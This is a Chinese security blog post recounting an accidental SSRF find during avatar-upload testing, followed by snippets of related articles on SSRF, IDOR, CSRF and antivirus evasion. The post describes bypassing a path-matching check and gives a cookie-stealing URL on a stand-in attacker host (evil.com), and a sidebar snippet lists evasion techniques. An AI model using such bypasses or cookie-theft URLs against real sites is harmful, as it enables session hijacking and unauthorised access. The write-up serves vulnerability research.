记一次偶然的SSRF漏洞挖掘与测试

最新推荐文章于 2024-03-07 12:57:16 发布
VIP文章 最新推荐文章于 2024-03-07 12:57:16 发布
阅读量309 收藏
点赞数
分类专栏: 漏洞挖掘 SSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/115150271
版权

 心得:去挖一个漏洞直接利用burpsuite抓包 然后一步一步过 看参数的具体含义 在可能出现漏洞的点重点去分析 测试;本次SSRF漏洞就是我在挖文件上传漏洞时一不小心测到的。

找到一个头像上传点,本来打算先上传一个正常的图片抓包看看 结果无意中发现它将img的存储路径直接爆了出来 这时想到SSRF 就是在调用内网资源的时候会发送 就开始进行测试

 

 

发包到repeater模块后返回正常信息 ,这里的测试我先将原路径下的所有地址全部替换,发现报错

这里的测试我先将原路径下的所有地址全部替换,发现报错

那就还原后一个一个测试,控制变量法发现最终匹配的字符串如下,猜测后端完全匹配该字符串

将该字符串保留,结合url跳转漏洞的绕过方式进行绕过 利用平台生成盗取cookie的URL 具体url为 http://evil.com?/data/upload/user/

 

不想当脚本小子的脚本小子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DWVA上传漏洞挖掘测试例1共4页.pdf.zip
11-21
DWVA上传漏洞挖掘测试例1共4页.pdf.zip
104-web漏洞挖掘SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
SSRF原理及漏洞演示
最新发布
dzqxwzoe的博客
03-07 846
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发 起的,所以它能够请求到与它相连而与外网隔离的内部系统。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
国内SRC漏洞挖掘技巧与经验分享
01-29
SRC经验文档
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_ex SSRF漏洞测试、利用 SSRF vulnerability testing and utilization SSRF [+] 服务端请求伪造,当作跳板攻击内网服务 [+] 扫描内部网络、服务 [+] 访问本机敏感文件 [+] 向特定端口发送数据包、payload . ├── exploit │   └── redis.py ├── lib │   ├── check_bypass.py │   ├── check.py │   ├── common.py │   ├── config.py │   ├── scan.py │   ├── test │   └── xmltest.xml ├── plugin │   └── weblogic.py ├── result │   ├── 192.168.1.107 │   │   ├── file_content.log │
基于模糊测试的工控网络协议漏洞挖掘方法
06-22
为解决传统漏洞挖掘方法不能在工控系统中直接应用的问题,提出一种基于模糊测试的 工控网络协议漏洞挖掘方法。使用工控网络协议测试用例变异因子生成协议特征值,每个变异因子 代表一类工控系统漏洞的特征。变异因子结合 Modbus TCP 协议特征生成不同的测试用例。通过 Modbus TCP 请求与响应的协议特征对应关系和旁路监听方法解决难以确定测试用例是否有效的问 题。为对工控私有协议进行模糊测试,建立了工控私有协议树,并对私有协议数据集进行了分类。 采用可变字节值概率统计方法、长度域学习方法、Apriori 和 Needleman/Wunsch 算法学习私有协议 特征,有效地提高了私有协议的测试用例接收率。通过对真实工控设备的实验分析,证明了该方法 能够有效检测工控公有、私有协议的漏洞
autoSSRF:一款基于上下文的智能SSRF漏洞扫描工具
FreeBuf_的博客
11-18 356
autoSSRF基于上下文识别漏洞,并且适用于大规模扫描任务。
burpsuite 越权_自动发现IDOR(越权)漏洞的方法:使用BurpSuite中的Autozie和Autorepeater插件来检测和识别IDOR漏洞,而无需手动更改每个请求的参数...
weixin_33116629的博客
01-14 1709
IDOR(越权)漏洞:也称为“不安全的直接对象引用”,当用户请求访问内部资源或基于用户提供的输入对象进行访问,服务器未执行合理的权限验证时,发生当前用户可以未经授权访问不属于其帐户权限的资源或数据。我们可以在BurpSuite插件库Bapp中安装Autorize和Autorepeater:使用Autorize发现IDOR漏洞让我们先来看一下“Autorize”。 对于客户端发送的任何请求,它将执行...
逻辑漏洞笔
qq_32812063的博客
11-28 655
逻辑漏洞-越权笔
SSRF漏洞】实战演示 超详细讲解
qinshuoyang1的博客
08-09 1536
通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞。
SSRF漏洞
weixin_61143354的博客
08-08 931
网络安全笔
网络安全工具汇总
剁椒鱼头没剁椒的博客
10-08 1586
整理到这里,我其实都要整理吐了,实在是整理不下去了,这里还是建议各位平常能够有收藏的习惯吧,有些工具没更新到的,或者很好的用的,你自己有就可以了,没的话就当参考,而且有很多工具都是公众号分享的,所有实在没有去汇总,太多了,就这样吧,后面所有内容都会放置到github上,去gihub上查看吧,同时由于公众号发表后就不太好修改,后面如果有更新都会再GitHub上更新。GitHub:https://github.com/djytmdj/Tool_Summary不提供工具的安装包,只提供链接,有没有后门我不知道,我
【网络安全SRC相关内容总结】
淋淋颖的博客
12-28 960
静态绕过使用强加密/压缩:XOR, base64,AES DES,商用算法...混淆加密:LLVM OLLVM...隐藏导入导出表:动态调用Win减少文件熵:分离加载,IPv4等资产保护壳:VM,自写,商用模拟正常软件:签名、文件名、图标、属性信息、资源等动态绕过沙箱和虚拟化隔离进程注册内核回调ETW日志检测堆栈跟踪检测进程链检测(黑加黑)利用AMSI接口沙箱/虚拟对抗延迟执行检测无法虚拟化的设备检测系统开机时间检测物理内存是否大于4G检测文件名是否修改检测进程信息。
burpsuite之CSRF测试
热门推荐
andyfeng088的博客
05-04 1万+
测试以burpsuite与火狐浏览器为例 一、设置代理 这个得先置为off,因为on的意思是 开启拦截,所以先关闭拦截才能成功提交表单。 这个得先置为off,因为on的意思是 开启拦截,所以先关闭拦截才能成功提交表单。 二、抓包 火狐: 进入对应可能存在漏洞的网址或表单 ·新增或修改表单: (1) 新增/修改 (2) 填写表单 (3...
网络安全:SSRF+XXE漏洞挖掘
m0_59598029的博客
12-25 887
1.访问一个产品,点击“Check stock”,拦截Burp Suite中的请求,发送给Burp Repeater。1.访问一个产品,点击“Check stock”,拦截Burp Suite中的请求,发送给Burp Intruder。1.访问一个产品,点击“Check stock”,拦截Burp Suite中的请求,发送给Burp Repeater。1.访问一个产品,点击“Check stock”,拦截Burp Suite中的请求,发送给Burp Repeater
Web漏洞-SSRF漏洞(详细)
Ays.Ie的博客
03-10 2725
该篇为Web漏洞-SSRF漏洞(详细)
渗透测试SSRF漏洞
weixin_52177486的博客
02-21 996
功能点:参数传的是一个url(形如:?url=http://abc.com/1.jpg) 除url外敏感的参数还有share、wap、link、src、source、target比参数名更重要的是看参数值是否为一个url地址。
SSRF漏洞(原理、挖掘点、漏洞利用、修复建议)
xv66666的博客
07-03 4381
SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。
SSRF漏洞详解
qq_48904485的博客
03-22 1万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
SSRF (Server-Side Request Forgery) 漏洞是一种常见的 Web 安全漏洞,攻击者通过构造恶意的请求,从而使服务器发起非预期的请求,可能导致敏感信息泄露、服务器受到攻击等后果。 在内网渗透中,SSRF 漏洞可以用来发起内网扫描、访问内部系统等攻击。通常情况下,攻击者会构造恶意请求,将目标网站的请求地址改为内部 IP 或者域名,从而让服务器发起请求,从而得到内部系统的信息。 下面是一个简单的 SSRF 漏洞利用的步骤: 1. 扫描目标网站:使用端口扫描工具扫描目标网站开放的端口,确定是否存在可利用的服务。 2. 构造恶意请求:构造一个包含内网地址的恶意请求,将请求地址改为内网地址。 3. 触发漏洞:将恶意请求发送给目标网站,从而触发 SSRF 漏洞。 4. 收集信息:利用 SSRF 漏洞,收集内部系统的信息,如端口、服务、操作系统等。 5. 利用漏洞:根据收集到的信息,选择合适的漏洞利用方式,从而取得系统权限。 在实际攻击中,攻击者还可能会采用其他方式来利用 SSRF 漏洞,如访问内部 Web 应用、获取敏感文件等。因此,网站开发人员需要注意防范 SSRF 漏洞,如过滤用户输入、限制请求地址等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值